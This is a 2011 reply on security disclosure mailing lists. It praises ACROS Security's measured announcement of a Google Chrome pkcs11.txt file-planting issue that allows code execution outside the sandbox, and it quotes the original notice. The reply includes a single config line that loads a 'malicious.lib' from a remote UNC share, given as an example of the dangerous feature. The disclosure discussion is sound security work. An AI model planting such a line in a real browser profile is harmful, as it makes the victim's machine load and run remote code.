Message-ID: <58DB1B68E62B9F448DF1A276B0886DF193035F19@EX2010.hammerofgod.com>
Date: Fri, 21 Oct 2011 16:22:02 +0000
From: "Thor (Hammer of God)" <thor@...merofgod.com>
To: "security@...ossecurity.com" <security@...ossecurity.com>,
    "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
    "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>,
    "cert@...t.org" <cert@...t.org>,
    "si-cert@...es.si" <si-cert@...es.si>
Subject: Re: Google Chrome pkcs11.txt File Planting

For what it's worth, I found this article to be far more "matter of fact" in regard to the general concept, the existing (default) conditions in play, and the conditions which need to be in place (or manipulated) in order for this to be exploited than some of the other material your company has presented in the past. Noting "it may or may not be a vulnerability" shows some research maturity and business intelligence on your part, and was actually refreshing.

When researchers spend too much time painting dire pictures of impact based on (what is typically) non-standard or exaggerated exposure scenarios, the actual message in the research is lost. In this case, developers can very easily see how including features that support functions such as "library=\\www.binaryplanting.com\demo\chrome_pkcs11Planting\malicious.lib" is a really bad idea.

t

>-----Original Message-----
>From: full-disclosure-bounces@...ts.grok.org.uk [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of ACROS Security Lists
>Sent: Friday, October 21, 2011 2:07 AM
>To: bugtraq@...urityfocus.com; full-disclosure@...ts.grok.org.uk;
>cert@...t.org; si-cert@...es.si
>Subject: [Full-disclosure] Google Chrome pkcs11.txt File Planting
>
>
>A month ago our company notified Google about a peculiar behavior of
>Chrome browser that can be exploited for execution of remote code outside
>Chrome sandbox under specific conditions. Our new blog post describes it all.
>
>http://blog.acrossecurity.com/2011/10/google-chrome-pkcs11txt-file-planting.html
>
>or
>
>http://bit.ly/olK1P9
>
>Enjoy the reading!
>
>
>Mitja Kolsek
>CEO&CTO
>
>ACROS, d.o.o.
>Makedonska ulica 113
>SI - 2000 Maribor, Slovenia
>tel: +386 2 3000 280
>fax: +386 2 3000 282
>web: http://www.acrossecurity.com
>blg: http://blog.acrossecurity.com
>
>ACROS Security: Finding Your Digital Vulnerabilities Before Others Do
>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/